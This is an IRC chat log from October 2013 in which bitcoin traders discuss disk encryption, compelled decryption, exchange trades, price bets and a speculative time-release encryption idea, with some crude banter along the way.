23:27:34 though it's certainly "not as much benefit as we'd hope" Oct 13 23:27:42 how not? if it's law enformcement, usually it's just sufficient to prove that you are owner of certain gpg key. Oct 13 23:27:44 which you are correct to bring up. Oct 13 23:28:05 nanotube it's basically an antivirus product. it's good to have for your girlfriend, so it keeps the system sorta-above water. Oct 13 23:28:07 then if you are unable to decrypt it, won't help you much Oct 13 23:28:36 jurov i don't quite follow the logic there. Oct 13 23:29:53 the logic is, such an powerful adversary doesn't really need the data, they have them from other sources, just metadata are OK to use against you Oct 13 23:30:02 i fail to see how this works. Oct 13 23:30:13 "your honor, we know X talked to Y. therefore X did it" ? Oct 13 23:30:41 even if X signed stuff with private key found on such piece of evidence Oct 13 23:30:43 > Oct 13 23:30:47 ? Oct 13 23:30:56 now deny that Oct 13 23:32:02 i deny. what ? Oct 13 23:32:13 circumstantial evidence, of the weakest sort. i'll just point and laugh at you. Oct 13 23:32:33 that you possess certain privkey on an purposely airgapped machine? Oct 13 23:32:47 as evidenced by gpg --list-keys Oct 13 23:33:02 without ever needing any passphrase Oct 13 23:33:38 herp. the proof is that i keep secrets ? Oct 13 23:33:45 what is this, england ? Oct 13 23:33:48 is it any easier to explain why have you encryped partitions but don't actually know what's in there? Oct 13 23:34:15 Bunnyh in most free countries it's enough to say it's nobody;'s business what you kee pthere and the da can either make a case or get lost. Oct 13 23:34:25 you're not making his case for him in any circumstance. Oct 13 23:34:36 can we all just agree that there are multiple attack vectors, and different approaches provide varying protections against them? Oct 13 23:35:03 no, please continue Oct 13 23:35:11 i'd summarize this by saying that there are needs for different granularities in encrypting data Oct 13 23:35:12 nanotube yes, we can. but we'll have to agree that while some things provide absolute protection against the attack vector, some other things provide partial protection. Oct 13 23:35:27 they may be more convenient or profitable or w/e, but they're still qualitatively different. Oct 13 23:35:35 what's this "the attack vector" you speak of? haven't we agreed that there are multiple? :D Oct 13 23:35:46 such as denying that attack vector exists "in any circumstance" mkay. Oct 13 23:36:11 [HAVELOCK] [AM1] 4 @ 0.81 = 3.24 BTC [-] Oct 13 23:36:32 it did exist here in eastern europe, just some 25 years ago Oct 13 23:36:41 mircea_popescu> Bunnyh in most free countries it's enough to say it's nobody;'s business what you kee pthere <- unfortunately there are countries that are not that free. Oct 13 23:36:50 they would sencence you on such "evidence", no problem Oct 13 23:36:57 we can agree that wearing a maillot is kinda like being dressed, except if it gets wet, or if it gets flashed or if there's a black light etc. Oct 13 23:39:15 jurov ostensibly they can just shoot you, too. hardly part of the discussion i guess. Oct 13 23:39:56 So, no one is running a MPOE or BBET passthrough currently? Jurov, would you be willing to take my holders on coinbr? Oct 13 23:40:19 Namworld: yes Oct 13 23:40:22 Havelock not accepting new assets and Bitfunder might not survive for much longer it seems. Oct 13 23:41:00 Namworld: did hl state a proper reason? Oct 13 23:41:13 No proper reason Oct 13 23:42:17 Only thing I might keep alive is BTC-BOND, manually. Buyback every small holders, only keep large ones. Oct 13 23:43:18 [HAVELOCK] [B] [XBOND] 92 @ 0.0012 = 0.1104 BTC [+] Oct 13 23:43:26 Namworld: but if you keep that up for very last moment like you did things after mpex delisting, then i may be hard to speak to Oct 13 23:43:30 re-reading the thing i gotta give it to dub... he kinda has good points. Oct 13 23:43:42 Namworld: i like some planning Oct 13 23:45:04 Ok jurov, I guess I'll offer either buyback at 110% MPEx ask price or transfer to coinbr. I'll PM you. Oct 13 23:48:24 [MPEX] [S.MPOE] 900 @ 0.00084598 = 0.7614 BTC [+] Oct 13 23:53:23 http://www.youtube.com/embed/edAxujKev1I Oct 13 23:53:23 The Chemical Worker's Song by Great Big Sea - YouTube Oct 13 23:55:03 oh and the real reason why i don't get the issue with fde, is that you imply attackers have access to memory and that implies the machine was on or was shut down just minutes ago Oct 13 23:55:20 now, who is going to keep airgapped machine always on? Oct 13 23:56:20 and if the adversary can time their attack precisely, they can as well tranquilize you right after you typed gpg passphrase Oct 13 23:57:42 again different windows. "computer being on" vs "that second right after he's typed a pw" Oct 13 23:58:10 i admit that. but doesn't look very different to me Oct 13 23:58:17 that's a problem of perspective, tho. Oct 13 23:58:29 also, whole disk vs file that was being processed. also very different payoffs. Oct 13 23:58:42 security is, in the end, the job of minimizing exposure. Oct 13 23:59:08 there's a reason people engaged in fencing stand sideways. and they all do it, because even if awkawrd and lulzy a stance, it is more secure. Oct 13 23:59:33 wait wat countries can you refuse to decryopt something? Oct 13 23:59:42 all of them. Oct 13 23:59:50 it's in the end the test of whether it's a country. Oct 13 23:59:57 right so, none Oct 14 00:00:01 in the real world Oct 14 00:00:08 yes in the real world. Oct 14 00:00:51 praps we should all move to romania Oct 14 00:01:06 you certainly should all move out of the us, if there's no more 5th. Oct 14 00:03:54 in most places that exist, afaik a judge can require something be opened for inspection Oct 14 00:04:09 they can require it all they want. Oct 14 00:04:19 they'll have to require it of their own agents. Oct 14 00:04:40 its the old $5 spanner deal though Oct 14 00:04:51 i wish i could share mircea's ideas about actual lawfulness of the law enformcement around here Oct 14 00:04:56 you can refuse, and enjoy prison until your mind changes Oct 14 00:05:14 nope. Oct 14 00:05:39 that'd be a sight, criminal contempt ordered in a criminal proceeding against the defendant who pleaded the 5th. Oct 14 00:05:42 this i wish to see. Oct 14 00:05:51 whats the 5th Oct 14 00:06:00 ;;google 5th amendment Oct 14 00:06:01 Fifth Amendment to the United States Constitution - Wikipedia, the ...: ; Fifth Amendment | LII / Legal Information Institute: ; Fifth Amendment | U.S. Constitution | LII / Legal Information Institute: (1 more message) Oct 14 00:06:15 I know what it is, its a completely retarded law that only america has Oct 14 00:06:28 in other news, i am currently eating taliban cookies, i wish it entered into the permanent record. Oct 14 00:06:31 what relevance does it have outside retardsville Oct 14 00:06:32 ;;google maamoul Oct 14 00:06:34 Ma'amoul - Wikipedia, the free encyclopedia: ; Maamoul: Stuffed Date-Orange Cookies Recipe : Food Network ...: ; Maamoul – Recipes from a Traditional Lebanese Easter- The Food ...: dub : praps we should all move to romania you certainly should all move out of the us, if there's no more 5th. Oct 14 00:09:45 [MPEX] [S.MPOE] 5855 @ 0.00084917 = 4.9719 BTC [+] {2} Oct 14 00:10:21 ok so the thing that only applies to people who have already given up any freedom or right to privacy Oct 14 00:10:46 [HAVELOCK] [B] [XBOND] 300 @ 0.0012 = 0.36 BTC [+] {2} Oct 14 00:10:57 important distinction Oct 14 00:11:19 wait what ? Oct 14 00:12:53 fyi, you don't need to even enter the US legally (transit) to be required by them to unlock and decrypt anything you are carrying Oct 14 00:13:09 phones, computers, storage etc Oct 14 00:13:55 dafuq Oct 14 00:14:28 let alone the willingness to rendite or simply drone strike in any corner of the planet Oct 14 00:14:55 herp. Oct 14 00:15:18 generally speaking, people can require anythning they feel like. the internet is full of derps requiring shit. Oct 14 00:15:26 i get tons of emails requiring all sorta crap all day long. Oct 14 00:15:27 etc. Oct 14 00:17:20 the difference isthe size of their stick Oct 14 00:17:43 dude get out. what stick ? Oct 14 00:18:00 what are they gonna do, punish you by paying for your three meals a day ? Oct 14 00:19:49 lol Oct 14 00:21:02 rather than expose my secrets for the fear of incarceration I'll just remain incarcerated, makes perfect sense Oct 14 00:21:20 do anything rather than play nice with idiots. Oct 14 00:23:46 fortunately for the idiots a large percentage of people !mircea_popescu have low tolerance for the stick they wield Oct 14 00:23:58 a well. Oct 14 00:24:57 sadly one of the security paradigms nobody seems to understand is that it must actually work Oct 14 00:25:54 must actually work != satisfy inept preconceived notions. Oct 14 00:26:10 there's never going to be security that "actually works" in the sense of bringing you santa back. Oct 14 00:27:36 sorry but you're the one talking in fairy tales Oct 14 00:28:03 so i suppose we leave it at that. Oct 14 00:28:06 magical kingdoms where the libertarian ideal is upheld Oct 14 00:28:31 pffft not even libertarian ideals.. rule of law. Oct 14 00:28:55 'rule of law' is a libertard dream Oct 14 00:29:53 there has been no such thing for quite some time now Oct 14 00:30:37 i suppose the courts look a lot different if you regard them from the priviledged end than from the business end. Oct 14 00:32:38 ^let this be put into public record. Oct 14 00:34:39 I suppose its easy to be optimistic Oct 14 00:36:07 good luck for then you actually need to test it Oct 14 00:36:14 when* Oct 14 00:36:20 dub you know, i'm probably the only one here with actual experience at successfully suing governments. what's easy is to elevate one's not particularly relevant experience to some sort of end-all story of the world. Oct 14 00:36:54 yeah well theres governments and theres governments Oct 14 00:37:48 nevertheless. Oct 14 00:39:46 now that this is out - for what did you sue them? Oct 14 00:41:31 most notably we had a dispute as to whether a foreign worker's qualifications are to be evaluated by its employer or the bureaucrats. Oct 14 00:42:17 evaluated? Oct 14 00:42:57 yeah, something like, "I want to hire X guy, give him a work permit". "we won't, because X guy could be replaced by local labor" "stfu" Oct 14 00:43:06 ah Oct 14 00:44:40 well their idea is something like... oh computer programming ? sure, we got this guy, he took a six months java course. Oct 14 00:45:20 computers, pizza ovens, trucks, what's the big difference. Oct 14 00:45:45 I was thinking more 'Yes that is a fantastic ass, we have nothing of that calibre locally, work visa granted' Oct 14 00:46:20 i never had trouble importing ass. that's easy to explain. Oct 14 00:47:35 anyway. i ended up getting a court order so extensive they ended up having to a) issue me a special made document, as in, without expiration date and b) modify their regulations. Oct 14 00:47:46 and since that particular crew is petrified of crazy mp. Oct 14 00:52:26 [HAVELOCK] [B] [XBOND] 158 @ 0.0012 = 0.1896 BTC [+] Oct 14 01:00:56 are the bitches in romania sexy? Oct 14 01:02:29 ;;google gradina edenului nsfw Oct 14 01:02:30 Olariu Ionela | Facebook: ; Radu Dumitru Daniel | Facebook: Oct 14 01:02:33 whoa. Oct 14 01:02:41 fwiw I have been before the courts as more than defendant :) Oct 14 01:02:52 http://trilema.com/2011/nsfw-gradina-edenului/ Oct 14 01:02:53 NSFW Gradina Edenului pe Trilema - Un blog de Mircea Popescu. Oct 14 01:06:20 so, the most read article of all trilema is trilema premium? Oct 14 01:07:16 actually the most read article is "cum se suge pula", a cocksucking guide. Oct 14 01:07:34 mebbe you should do it in english too Oct 14 01:08:26 yeh one of these days. Oct 14 01:15:05 massive $150 breakout happning. huge volume on gox. going to hit $200 this month. Oct 14 01:15:38 ;;ticker Oct 14 01:15:39 MtGox BTCUSD ticker | Best bid: 146.15000, Best ask: 147.00000, Bid-ask spread: 0.85000, Last trade: 146.15000, 24 hour volume: 14320.08849133, 24 hour low: 141.28508, 24 hour high: 147.00000, 24 hour vwap: 144.48451 Oct 14 01:15:52 i dont mind Oct 14 01:16:10 so that's why i was selling calls yest Oct 14 01:16:38 selling calls? you will get CRUSHED.... we're heading to $250 by dec Oct 14 01:16:42 quite a wild prediction fractal Oct 14 01:16:58 fractal you should put some money on some bbet Oct 14 01:17:06 its guaranteed -- SR is out of the picture now -- china volume just overtook all USD volume.... massive buying coming in Oct 14 01:17:21 wheres the BBET bet? i'll put down 100 BTC now... Oct 14 01:17:27 fractal i don't have a choice, im passive in the matter. Oct 14 01:17:48 Oct 11 21:39:07 [MPEX] [O] [O.USD.C131T] 685 @ 0.32277052 = 221.0978 BTC [-] Oct 14 01:17:51 [MPEX] [S.MPOE] 2300 @ 0.00084985 = 1.9547 BTC [+] Oct 14 01:17:57 100 btc on $250 by dec? Oct 14 01:18:11 all the idiots saying that bitcoin only has value because of SR --- i've been saying its not true for 2 years... now i am vindicated. i will be proven right again as we hit $250 this year once more Oct 14 01:18:24 can you name a site where you can play against each other different games for bitcoins? I dont mean a casino or gambling site. Just playing against each other in different pc games Oct 14 01:18:37 yeah the people in this channel are always saying SR is all bitcoin's value... Oct 14 01:18:48 well there isnt one of 250 but you have a 200 bet Oct 14 01:18:52 fractal 2 years ? wut ? lol Oct 14 01:18:53 http://bitbet.us/bet/529/bitcoin-price-to-rise-above-200-before-the/ Oct 14 01:18:54 BitBet - Bitcoin price to rise above $200 before the end of 2013 Oct 14 01:19:43 which exchange is that bet for Oct 14 01:20:24 kako: wow. thats EASY MONEY! Oct 14 01:20:35 i'm getting on that shit right now. free BTC. Oct 14 01:20:40 zoinky, mtgox, its in the link Oct 14 01:20:44 lolz. what n00bz betting NO... idiots Oct 14 01:21:15 o_O I just noticed http://bitbet.us/bet/555/difficulty-to-continue-increasing-by-over-20/ is ambiguous. "Each BTC network difficulty change as reported by gribble before the end of January 2014 will be an increase of more than 20% over the last. " Oct 14 01:21:18 mtgox should be easier, they';ve always been higher. Oct 14 01:21:29 turbo_ac100 what's the ambiguity ? Oct 14 01:21:58 10BTC pays out 14 -- 40% , but 100BTC pays out 104 -- 4% . lol Oct 14 01:22:04 kakobrekla, i did a search for mtgox on the page and all i see is for another bet Oct 14 01:22:16 and i have to wait 10 weeks.... i'm better off buying futures at ICBIT.se instead of making that gamble at BitBet!! Oct 14 01:22:35 lol mkay. glwt. Oct 14 01:22:48 "the last" doesn't refer to the last increase, i.e. 20% -> 24 % and so on but rather "the last" difficulty as in ;;diffchange will be > 20% Oct 14 01:22:55 and 1 btc pays 2 btc Oct 14 01:23:01 fractal: you can buy the same calls on mpex Oct 14 01:23:31 jurov: MPEX? you mean that useless site with ZERO volume because MP refuses to let new users join without paying 40BTC??? idiotic. Oct 14 01:23:33 each [...] over the last. Oct 14 01:23:40 seems fine. Oct 14 01:23:44 no offence MP... Oct 14 01:23:57 you are aware that the only people actually trading the exchange rate traded it there, yest. Oct 14 01:23:57 [MPEX] [S.MPOE] 5900 @ 0.00085465 = 5.0424 BTC [+] {2} Oct 14 01:24:04 but you'd make more money with no signup fees Oct 14 01:24:06 for all your talk of doing w/e on random bucket shops. Oct 14 01:24:42 fractal: there's a broker, you are kicking into open doors Oct 14 01:24:46 ICBIT.se is legitimate and been up for 2 years, works great... and they're doing a lot of volume these days.... you'll eventually be surpassed unless you drop signup fees Oct 14 01:24:51 mircea_popescu, so it's diffchange 20%, next diffchange will have to be 20%*1.2=24% and so on, right? Oct 14 01:25:01 dude, you've been saying whatever for two years, get out. link or gtfo. Oct 14 01:25:03 jurov: broker == default risk Oct 14 01:25:39 what? you think coinbr is short and naked? Oct 14 01:25:44 turbo_ac100 the diffs must follow the curve x, 1.2x, 1.44x, 1.728x etc Oct 14 01:25:57 ;;calc 20*1.2 Oct 14 01:25:58 24 Oct 14 01:26:01 ;;calc 20*1.2*1.2 Oct 14 01:26:01 28.8 Oct 14 01:26:03 etc Oct 14 01:26:07 [Oct 1 2012 01:52] hey guys, I think 2013 is the year of bitcoin, we'll probably hit $100, maybe $250. Oct 14 01:26:11 ^^ real logs Oct 14 01:26:40 so two years in the oct 1 - oct 13 interval ? Oct 14 01:26:54 meh. stupid bet... gonna have to cancel that... Oct 14 01:27:14 bitfunder, havelock, mpex, cryptostocks.. did i miss any Oct 14 01:27:32 well Oct 14 01:27:34 MP, the fact that 1 year wasn't 2 years is just a trivial detail Oct 14 01:27:39 if you list cryptostocks you missed another 3 or so Oct 14 01:27:45 ? Oct 14 01:27:47 point is, i'm a genius.... we'll hit $250 by december Oct 14 01:27:49 for sure Oct 14 01:28:06 thats all i got.. what are the others? Oct 14 01:28:10 theres like pico stocks and something 123.com chinese thingy or something and therock exchange Oct 14 01:28:12 maybe more Oct 14 01:28:17 ah pico Oct 14 01:28:18 thats right Oct 14 01:28:41 ;;google "hey guys, I think 2013 is the year of bitcoin, we'll probably hit $100, maybe $250" Oct 14 01:28:42 Bitcoin Hits New Record, Crosses $250 | Zero Hedge: ; Hi. I am from the future. Thanks Bitcoin! : Bitcoin - Reddit: ; Bitcoin Exchange Scam – Bitcoins Are Now Worthless | NERDr.com: herp. Oct 14 01:29:10 http://imgur.com/jgwRMJo -- this is why $250 is guaranteed before the end of the year -- all hail CHINA!! Oct 14 01:29:10 wasn;'t there some cheapo clone of mpex at some point ? Oct 14 01:29:10 China will be leading the next run up... - Imgur Oct 14 01:29:36 like, same css glory and everything ? some dood on the forum made it cause he was insulted by mpoe-pr Oct 14 01:30:47 what channel is most appropriate for trading? Oct 14 01:31:01 in your case, probably #labcoin. Oct 14 01:31:37 whats labcoin? sounds like a scam Oct 14 01:31:41 ^^ Oct 14 01:31:54 well... genius ppl congregate there. Oct 14 01:31:54 i'm such a genius that I can tell scams just by the name of the company Oct 14 01:32:07 #bitcoin-geniuses Oct 14 01:32:13 totally. Oct 14 01:32:43 i'm ops in #bitcoin-geniuses. Oct 14 01:32:52 http://imgur.com/jgwRMJo this reddit picture is so stupid.. just link to some useful statistics pls Oct 14 01:32:53 China will be leading the next run up... - Imgur Oct 14 01:33:14 dexx7: bitcoincharts.com 24 hr Oct 14 01:33:21 yes, for example Oct 14 01:33:57 the poster put up a spreadsheet of all the data Oct 14 01:34:52 yes yes, chinese ppl are buying bitcoin. Oct 14 01:36:31 http://paulgraham.com/taste.html Oct 14 01:36:32 Taste for Makers Oct 14 01:37:59 http://trilema.com/2011/nsfw-gradina-edenului/ garden party at popescu's? Oct 14 01:38:00 NSFW Gradina Edenului pe Trilema - Un blog de Mircea Popescu. Oct 14 01:39:41 selling the girls downriver. Oct 14 01:39:48 lol Oct 14 01:56:29 [MPEX] [S.MPOE] 5800 @ 0.00084799 = 4.9183 BTC [-] {3} Oct 14 01:58:07 difficulty 250,000,000 next jump? i told eveyrone this would happen. so many idiots buying mining eqiupment and losing money..... fuck. im so smart. honestly... fuck. Oct 14 01:59:16 ;;bc,stats Oct 14 01:59:19 Current Blocks: 263445 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 650 blocks | Next Difficulty In About: 2 days, 21 hours, 38 minutes, and 34 seconds | Next Difficulty Estimate: 244476073.369 | Estimated Percent Change: 29.16022 Oct 14 02:00:49 fractal so what? Oct 14 02:01:41 so, nobody listened to me and lost money.... now I will charge for my consulting services since my track record is perfect Oct 14 02:02:00 you're a loony. Oct 14 02:02:13 10BTC for 1 month of advice.... correspondance by mail only Oct 14 02:02:21 100BTC for phone number... msg me Oct 14 02:03:19 fractal: i'll pay you even 100btc... but only after it turns out correctly Oct 14 02:04:04 jurov, no problem. what do you want to know? Oct 14 02:04:37 [HAVELOCK] [HIM] 4 @ 0.05032501 = 0.2013 BTC [-] {2} Oct 14 02:04:48 nm that was rather dumb idea Oct 14 02:04:57 Avalon batch 2's going for $3K on ebay... pretty funny, they were $30,000 a few months ago. Oct 14 02:05:35 avalon's will mine 10 BTC max going forward http://btcinvest.net/en/bitcoin-mining-profit-calculator.php?diff=189281249.28103&dcosts=500&diff_mincrease=30&blpbtc=25&dhsmhs=80000&diff_mincreasedecrease=3&btcusd=131.40&dpowcon=30&btcusd_mincrease=1&pcost=0.25&calcweeks=32&dleadtime=0&action=calc Oct 14 02:05:38 [HAVELOCK] [HIM] 2 @ 0.05030001 = 0.1006 BTC [-] Oct 14 02:05:39 [HAVELOCK] [AM100] 92 @ 0.00731162 = 0.6727 BTC [-] {4} Oct 14 02:05:48 so , they're worth $1,500 or less.... i'll pay $500 for them. msg me Oct 14 02:06:29 jurov lol Oct 14 02:06:38 man, those poor bastards who haven't got their BFL singles yet... Oct 14 02:07:41 meanwhile LTC mining holding up for now,,, but dropping slowly to zero Oct 14 02:12:17 what is this btc-china? Oct 14 02:23:15 this is btc-spaaarta Oct 14 02:27:25 thestringpuller some chinese based exchange. Oct 14 02:30:51 The greatest heist in the world: "Stealing Chinese gold from an American depository." Oct 14 02:33:17 https://bitcointalk.org/index.php?topic=310320.0 Oct 14 02:33:18 [ANN] UK Bitcoin Exchange Oct 14 02:34:05 broken as fuck. Oct 14 02:36:15 they're incorporated in a residential area ?! Oct 14 02:36:27 china is now more important then usa when it comes to bitcoin Oct 14 02:36:38 majority of volume is now on chineese exchanges Oct 14 02:37:31 fractal yes yes. you could have read all about it on trilema a while back. you genius you. Oct 14 02:37:47 * is more important than murica outside storing homeless bitcoin developers Oct 14 02:39:10 incorporated in feb, guy made acct in march, name changed in august Oct 14 02:39:31 statement of capital shows jack shit and the prices there are in the 50k range, to own. they rent. Oct 14 02:50:49 MP , do you claim your geniuseness exceeds mine?? that is quite the claim. Oct 14 02:50:49 bitcoin $250 this year. i'll be back dec 31 to confirm. Oct 14 02:51:00 place 100btc and you dont have to come back Oct 14 02:51:03 bet Oct 14 02:51:24 [HAVELOCK] [AM100] 125 @ 0.00702865 = 0.8786 BTC [-] {8} Oct 14 02:51:35 lol Oct 14 02:53:11 i hope this one has better sauna security. Oct 14 03:01:34 [HAVELOCK] [AM1] 1 @ 0.76000068 BTC [-] Oct 14 03:05:38 [HAVELOCK] [HIM] 6 @ 0.05020666 = 0.3012 BTC [-] {3} Oct 14 03:06:39 [HAVELOCK] [HIM] 8 @ 0.0502 = 0.4016 BTC [-] Oct 14 03:09:19 is there a fancy visualisation of address dependencies? Blockchain explorer with added graphics bling? Oct 14 03:09:41 https://bitcointalk.org/index.php?topic=125629.msg3331940#msg3331940 Oct 14 03:09:42 epic shit. Oct 14 03:09:43 [BTC-TC] Virtual Community Exchange [WINDING DOWN] Oct 14 03:09:51 turbo_ac100 not afaik. Oct 14 03:10:08 IPO... Oct 14 03:10:54 go for it. Oct 14 03:16:01 so are we yet at the realisation that btct may be slightly undercapitalised or not quite ? Oct 14 03:20:51 mircea_popescu did you make a deal with the bitvps guys? Oct 14 03:21:07 vis-a-vis Namworld the Canadian Oct 14 03:21:48 um not afaik ? Oct 14 03:24:57 [HAVELOCK] [AM1] 1 @ 0.76000068 BTC [-] Oct 14 03:32:04 [HAVELOCK] [AM1] 1 @ 0.76000068 BTC [-] Oct 14 03:38:09 [HAVELOCK] [B] [XBOND] 416 @ 0.0012 = 0.4992 BTC [+] Oct 14 03:44:34 not sure trotting out Bitcoin Oz to belittle is necessary Oct 14 03:46:38 might want to suggest she uses a slighty sturdier strawman Oct 14 03:51:13 what, the guy that was selling glbse stocks is no good ?!?!11? Oct 14 03:53:18 https://bitcointalk.org/index.php?topic=297334.msg3333239#msg3333239 Oct 14 03:53:19 [SolarWind , A Bitcoin Mining Company] 100TH/s Mining Farm - Official Thread Oct 14 03:53:20 aint that cute Oct 14 03:53:24 a company on a usb stick. Oct 14 03:53:37 also the guy outed as having stabbed old ladies to death in a drunken rampage Oct 14 03:54:22 haha wtf kakobrekla Oct 14 03:55:27 dub and a whole lot moar. Oct 14 04:16:03 dahahahaha there's a trilema premium!? **** BEGIN LOGGING AT Mon Oct 14 13:59:56 2013 Oct 14 14:03:23 [HAVELOCK] [AM1] 2 @ 0.69000001 = 1.38 BTC [-] Oct 14 14:06:27 [HAVELOCK] [AM1] 1 @ 0.69000001 BTC [-] Oct 14 14:08:17 ;;avg price Oct 14 14:08:18 Error: "avg" is not a valid command. Oct 14 14:09:18 ;;ticker Oct 14 14:09:19 MtGox BTCUSD ticker | Best bid: 152.00576, Best ask: 152.49995, Bid-ask spread: 0.49419, Last trade: 152.00000, 24 hour volume: 31063.95478779, 24 hour low: 143.10000, 24 hour high: 153.69902, 24 hour vwap: 148.48608 Oct 14 14:09:36 ;;next Oct 14 14:09:37 See latest update from Onefixt here: https://twitter.com/BitcoinOracle/ Oct 14 14:10:30 [HAVELOCK] [AM1] 2 @ 0.69 = 1.38 BTC [-] Oct 14 14:13:33 [HAVELOCK] [AM1] 2 @ 0.69 = 1.38 BTC [-] Oct 14 14:19:09 based on current bids for s.Nsa, based on the 1% minimum, it's a go ! Oct 14 14:22:42 [HAVELOCK] [AM1] 4 @ 0.6825 = 2.73 BTC [-] {2} Oct 14 14:39:13 ;;seen ThickAsThieves Oct 14 14:39:13 ThickAsThieves was last seen in #bitcoin-assets 1 day, 18 hours, 53 minutes, and 44 seconds ago: dat PMB Oct 14 14:39:59 [HAVELOCK] [AM1] 2 @ 0.670001 = 1.34 BTC [-] Oct 14 14:41:00 [MPEX] [S.MPOE] 945 @ 0.00084948 = 0.8028 BTC [-] Oct 14 14:43:02 [HAVELOCK] [AM1] 3 @ 0.66202 = 1.9861 BTC [-] Oct 14 14:44:03 [HAVELOCK] [AM1] 1 @ 0.662 BTC [-] Oct 14 14:48:27 bitesak yeah Oct 14 14:53:47 what is s.nsa anyway? i have a vague impression, but that's solely based on the description of that gpg-token Oct 14 14:57:37 http://trilema.com/snsa-first-product-the-cardano did you read that already? Oct 14 14:57:38 S.NSA first product - The Cardano pe Trilema - Un blog de Mircea Popescu. Oct 14 14:58:31 > based on the description of that gpg-token Oct 14 14:58:40 yup, i did Oct 14 14:58:48 and i saw the contract on mpex Oct 14 14:59:28 i was just wondering, if there is a document somewhere with more details :) Oct 14 15:00:20 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 14 15:01:44 I am all for more understanding, I guess you can list your questions if any? Oct 14 15:02:45 i have no specific question at the moment Oct 14 15:05:36 i see it as the first physical product made through and thanks to bitcoin, other than Bitcoin coins and Tshirt branded stuff I guess. Oct 14 15:07:18 are you an investor or "involved"? Oct 14 15:09:28 nope, I am considering it though and interested in purchasing a few for christmas :) Oct 14 15:10:09 ah i see.. yes, the gpg-token sounds like a really neat object Oct 14 15:10:32 this is interesting Oct 14 15:10:42 is it MP's own design? Oct 14 15:10:46 I'll probably start with one, test it and do my best to understand it and use it as a means to promote use of GPG among friends and girlfriends Oct 14 15:14:23 bitesak well, miners are more ocmplex products Oct 14 15:14:46 gecko_x2 not in any significant degree. asciilifeform is the tech there. Oct 14 15:15:41 mircea_popescu, I wanted to refer to Casascius Bitcoins for the coins Oct 14 15:16:04 a Oct 14 15:17:37 [HAVELOCK] [AM1] 2 @ 0.66200001 = 1.324 BTC [+] Oct 14 15:18:01 mp, ok thx Oct 14 15:18:24 yea GPG key management was always the issue Oct 14 15:18:40 i remember playing with centralized key servers back in the days Oct 14 15:19:05 there's just no way a normal joe sixpack can do that Oct 14 15:19:19 irl Oct 14 15:19:38 anyways Oct 14 15:19:59 i don't even think gpg keys are the future Oct 14 15:20:16 there is one thing that hasn't been mentioned at all after the snowden case Oct 14 15:20:32 one thing that the NSA is totally defenceless against Oct 14 15:20:53 currently only used in online banking Oct 14 15:21:02 and that's OTP Oct 14 15:21:19 that's the way messages was delivered during WW2 Oct 14 15:21:23 and it fucking works Oct 14 15:21:51 i think that a single static key as a concept is pretty much dead Oct 14 15:22:16 except maybe for initially sharing the actual OTP Oct 14 15:24:00 believe me, it's been mentioned. Oct 14 15:24:19 not enough Oct 14 15:24:22 asymmetric keys are a much better solution for poor people, however Oct 14 15:24:32 because poor people can not afford to move otp keys around safely. Oct 14 15:24:47 hmm Oct 14 15:25:55 meanwhile, properly implemented pgp is still uncrackable. Oct 14 15:26:01 yes Oct 14 15:26:46 [HAVELOCK] [AM1] 3 @ 0.663 = 1.989 BTC [+] Oct 14 15:26:57 there is one new concept that the blockchain would make theoretically possible too Oct 14 15:27:12 time-release encryption Oct 14 15:27:38 there was a start-up last year to do this Oct 14 15:27:40 nothing came of it. Oct 14 15:28:31 the blockchain could be used so that a key to a piece of data would be split into say 100000 pieces Oct 14 15:28:46 51% of those pieces would be needed to decrypt Oct 14 15:30:46 anyways Oct 14 15:31:13 it's a very interesting concept, if you think about encrypting contracts, testimonies, wills etc Oct 14 15:32:11 hmm.. but isn't the collection of pointers to the parts more or less similar to passwords or a key? Oct 14 15:32:43 the incentive not to release the key early would be monetary Oct 14 15:33:00 let's say you encrypt 'hello world', for 1 month Oct 14 15:33:23 you have an altcur, called 'timecoin' Oct 14 15:33:34 okay Oct 14 15:33:56 you have say 1 second coins, 1 minute coins and 1 hour coins Oct 14 15:34:35 you combine them to make up a month Oct 14 15:34:53 [HAVELOCK] [AM1] 1 @ 0.663 BTC [+] Oct 14 15:35:13 ppl have clients where they can trade all these coins Oct 14 15:35:19 yup Oct 14 15:35:33 say there is the amount of one second coins to make up 100 years Oct 14 15:35:37 same with minutes Oct 14 15:35:40 same with hours Oct 14 15:36:00 you encrypt the message, and the keys are freely traded globally Oct 14 15:36:24 ppl have clients which holds fractional pieces of all time encrypted data Oct 14 15:36:30 just fractions Oct 14 15:37:04 the value of the coins can only be released after a message is decrypted at the expected time, no sooner Oct 14 15:37:31 should 51% of the holders of these anonymous timecoins decide to all release them ahead of time, they would become worthless Oct 14 15:37:55 something like that Oct 14 15:38:06 i'm not smart enough to fully figure it out Oct 14 15:38:20 so you would have on your pc a client software Oct 14 15:38:29 with a portfolio of time encrypted data Oct 14 15:39:00 and as the 1 month encrypted data, when it's time to decrypt Oct 14 15:39:10 the client would automatically do it for you Oct 14 15:39:28 so you could trade unknown future secrets Oct 14 15:39:38 the speculation would be rampant Oct 14 15:39:52 lol Oct 14 15:40:22 i don't think i fully get it Oct 14 15:40:46 well Oct 14 15:41:06 it's hard to explain Oct 14 15:41:41 there is an old post about the concept Oct 14 15:41:42 https://bitcointalk.org/index.php?topic=248466.0 Oct 14 15:41:43 Time-release encryption using Bitcoin? Oct 14 15:41:47 yeah Oct 14 15:41:51 er Oct 14 15:41:53 ah ty Oct 14 15:42:26 but this post doesn't mention coins as i'm thinking Oct 14 15:42:33 i'm thinking you make 3 altcoins Oct 14 15:42:39 seconds, minutes, hours Oct 14 15:42:58 to make up for let's say 500 years Oct 14 15:43:14 i dunno should there be 500 years combined, or 500 years of each Oct 14 15:43:36 i'm not smart enough :p Oct 14 15:44:50 but each holder would only have a fraction of the future secret Oct 14 15:45:06 say george soros want to encrypt something to be released 50 years after his death Oct 14 15:45:21 is it like.. "when 2030030 second coins are mined, it's xxx date, time"? Oct 14 15:45:25 fractions of keys to that data would be traded just like altcur's currently Oct 14 15:45:31 yeah Oct 14 15:46:07 combined with the fact that there is no incentive for all the hundreds of thousands of holders of the fractional keys to release them all ahead of time Oct 14 15:47:02 they might not even know what this or that fractional key is really hiding Oct 14 15:47:06 until the due date Oct 14 15:47:14 man the speculation would be awesome Oct 14 15:47:48 like 'i have 350 1 second keys holding soros's secret' Oct 14 15:48:04 and they are trading 2500% above initial value :p Oct 14 15:48:10 xD Oct 14 15:48:19 because ppl think the secret is gonna be worth millions Oct 14 15:48:39 and 